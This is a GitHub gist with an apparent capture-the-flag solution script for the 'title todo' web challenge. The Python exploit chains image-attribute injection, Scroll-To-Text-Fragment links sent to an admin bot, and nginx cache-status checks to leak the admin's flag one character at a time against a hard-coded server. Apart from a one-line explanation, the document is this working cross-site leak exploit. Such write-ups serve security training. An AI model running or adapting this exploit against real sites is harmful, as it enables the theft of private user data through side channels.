Skip to content

Instantly share code, notes, and snippets.

@sqrtrev

sqrtrev/title todo.md

Created March 29, 2022 03:09
Show Gist options
  • Save sqrtrev/5cbe95c8d2cbc6d44bbd721cc2ae5884 to your computer and use it in GitHub Desktop.
Save sqrtrev/5cbe95c8d2cbc6d44bbd721cc2ae5884 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
title todo.md

Using STTF and nginx cache header, we can leak the admin's flag.

#!/usr/bin/env python3
import requests
import random
import time

target = 'http://35.187.204.223'
rfile = open('./a','r') #a has nothing interesting

def uploadImage(payload):
    z = 'A'*10000+str(random.random())+' IMHERE '
    r = s.post(f'{target}/image',data={'title':z,'img_url':f'/static/image/68fa5809a96e4870989609a6676826ba.jpg?a={payload} loading=lazy','img_file':rfile}).text
    r = r.split("\n")
    for q in r:
        if(z in q):
            q = q[q.index('<a href="')+10:q.index(z)-2]
            return q
s = requests.session()
s.post(f'{target}/login',data={'username':'adsfadfadfhsdjf','password':'adsfadfadfhsdjf'})
# http://35.187.204.223/image/26233421-c4b1-4b4b-a43b-fe3770c5c071

flag = 'LINECTF{0/5/d/'
while 1:
    for cccc in "0123456789abcdef":
        key = str(random.random())[-8:]
        g = uploadImage('lmao'+key)
        payloadlol = g+'#:~:text='+flag+cccc
        r = s.post(f'{target}/share',json={'path':payloadlol}).json()
        assert(r['result'] == 'ok')
        time.sleep(5)
        if(requests.get(f'{target}/static/image/68fa5809a96e4870989609a6676826ba.jpg?a=lmao{key}').headers['X-Cache-Status'] == 'HIT'):
            flag += cccc+'/'
            print(flag)
            break
        else:
            print(cccc)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment